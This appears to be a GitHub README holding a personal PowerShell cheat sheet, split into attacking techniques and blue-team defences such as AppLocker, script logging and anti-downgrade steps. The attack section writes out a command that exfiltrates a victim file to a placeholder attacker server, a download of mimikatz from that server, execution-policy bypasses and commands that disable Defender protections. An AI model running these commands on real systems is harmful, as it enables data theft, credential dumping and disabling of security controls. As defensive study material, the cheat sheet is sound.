Source: https://github.com/d3fenderz/powershell_commands (owner d3fenderz, license GPL-3.0, created 2023-02-01, last pushed 2023-04-13; topics: blueteam, cheatsheet, guide, pentesting, powershell, security-guide, windows)

# PowerShell Commands

Personal sheet for PowerShell 🧢

TO BE CONTINUED indefinitely...

![GitHub last commit](https://img.shields.io/github/last-commit/d3fenderz/powershell_commands?label=last%20update%3A)

## Attacking techniques: practical examples

### HTTP requests

#### Exfiltrate data

```powershell
PowerShell.exe -ex bypass -noprofile -c Invoke-WebRequest -uri https://{ATTACKER_IP_SERVER} -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Victim\path\to\data.xml')))
```

#### Download attacking tools

```powershell
PowerShell.exe -ex bypass -noprofile -c Invoke-WebRequest -Method GET -uri https://{ATTACKER_IP_SERVER}/exec/mimikatz.exe -OutFile "c:\Users\Victim\mimi.exe"
```

### Bypass Execution policy

```powershell
PowerShell.exe -noprofile -executionpolicy bypass -file .\malicious.ps1
```

or:

```powershell
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
```

Setting the execution policy to `RemoteSigned` only allows running unsigned scripts.

### Exploit debugging variables

```
__PSLockdownPolicy
```

If this environment variable is set in production, there is a chance admins think it is a safety measure.

### Place a downgrade attack

```powershell
PowerShell.exe -Version 2
```

Older versions of PowerShell have fewer security features, according to [unicorn](https://github.com/trustedsec/unicorn).

### Run PowerShell commands without PowerShell.exe

You can use [p0wnedShell](https://github.com/Cn33liz/p0wnedShell) or the more recent [PowerLessShell](https://github.com/Mr-Un1k0d3r/PowerLessShell).

### Disable critical protections

```powershell
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
```

### Attack RDP connections

If admins use misconfigured RDP (Remote Desktop Protocol) for remoting, it can be brute-forced to pass malicious cmdlets.

## Defense

### Limit unconstrained code execution

```powershell
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
```

Default since PowerShell v5 if you use AppLocker.

### Use AppLocker

#### Overview

[Overview by Microsoft](https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/applocker-overview)

#### cmdlets for AppLocker

##### Get the current AppLocker configuration

```powershell
Get-AppLockerPolicy -Effective
```

##### Create an AppLocker policy

```powershell
# New-AppLockerPolicy needs file information as input; build rules from the files in a directory
Get-AppLockerFileInformation -Directory "C:\Program Files" -Recurse | New-AppLockerPolicy -RuleType Publisher, Hash -User Everyone -Xml
```

##### Test an exec against the AppLocker policy

```powershell
# Test-AppLockerPolicy needs a policy object (or -XmlPolicy <file>) to test against
Get-AppLockerPolicy -Effective | Test-AppLockerPolicy -Path <path_to_exec>
```

### Add GPOs (Group policies)

#### Enable Module and Script block logging

Go to Windows Configuration > Policies > Administrative Settings > Windows Components > Windows PowerShell

* Turn on Module Logging
* Turn on PowerShell Script Block Logging

or with PowerShell:

```powershell
New-Item "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames", "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Force | Out-Null  # policy keys do not exist until created
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging" -Name EnableModuleLogging -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames" -Name "*" -Value "*"  # log every module
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1
```

Then it is possible to forward the logs to a SIEM or similar software.

#### Enable transcripting

GPO or:

```powershell
New-Item "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Transcription" -Force | Out-Null
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Transcription" -Name "EnableTranscripting" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Transcription" -Name "EnableInvocationHeader" -Value 1
```

#### Enable Protected Event Logging

Go to Windows Components -> Administrative Templates -> Event Logging: "Enable Protected Event Logging." You'll have to provide a valid certificate.

or:

```powershell
New-Item "HKLM:\Software\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging" -Force | Out-Null
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging" -Name "EnableProtectedEventLogging" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging" -Name "EncryptionCertificate" -Value $Certificate
```

Where `$Certificate` is the public certificate used to encrypt the log entries.

### Set Execution policy

```powershell
Get-ExecutionPolicy
Set-ExecutionPolicy Restricted
```

`Restricted` should be the default, but check it.

### Anti-Downgrade

```powershell
Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root
```

More advanced tricks [here](https://www.leeholmes.com/detecting-and-preventing-powershell-downgrade-attacks/).

### Challenges for attackers

Some attacks attempt to modify settings and disable some protections. There are important inconveniences for attackers, though:

* most commands require an elevated shell
* notifications are sent by default
* Windows events are triggered by default

### Suspicious Cmdlets

Many legitimate commands like `Invoke-WebRequest` can be exploited by attackers, but some cmdlets look more suspicious than others. Here are a few examples:

* `Invoke-Mimikatz`
* `Invoke-ShellCode`
* `Get-FileHash`
* `Invoke-DllInjection`
* `Get-Hotfix | measure`

It often means attackers used a known tool (e.g., PowerSploit, Mimikatz, Powercat) or performed advanced enumeration.

### Enable JEA

JEA (Just Enough Administration) allows more control over PowerShell, especially if you need more granularity on cmdlets and security for remoting.

[Source: Microsoft JEA](https://learn.microsoft.com/en-us/powershell/scripting/learn/remoting/jea/overview?view=powershell-7.3)

### Misc: other helpful commands

#### Get list of installed software

```powershell
Get-WmiObject Win32_Product | Select-Object Name
```

Note that querying `Win32_Product` makes Windows Installer validate (and possibly repair) every installed MSI package, so it is slow and has side effects.

#### Get list of running processes

```powershell
Get-Process
```

#### Get network connections

```powershell
Get-NetTCPConnection
```

#### Get active firewall rules

```powershell
Get-NetFirewallRule
```

#### Get list of scheduled tasks

```powershell
Get-ScheduledTask
```

#### Get event logs

```powershell
Get-EventLog -LogName Security
```

#### Search for specific event logs

```powershell
Get-EventLog -LogName Security | Where-Object {$_.EventID -eq <event_id>}
```

#### Get list of local user accounts

```powershell
Get-LocalUser
```

#### Get list of local groups

```powershell
Get-LocalGroup
```

#### Get list of environment variables

```powershell
Get-ChildItem Env:
```

#### Get list of services

```powershell
Get-Service
```

#### Start a service

```powershell
Start-Service -Name <service>
```

#### Stop a service

```powershell
Stop-Service <service>
```

#### Stop a running process

```powershell
Stop-Process -Name <process>
```

#### Remove a scheduled task

```powershell
Unregister-ScheduledTask -TaskName <task>
```

#### Disable a firewall rule

```powershell
Disable-NetFirewallRule -DisplayName <rule>
```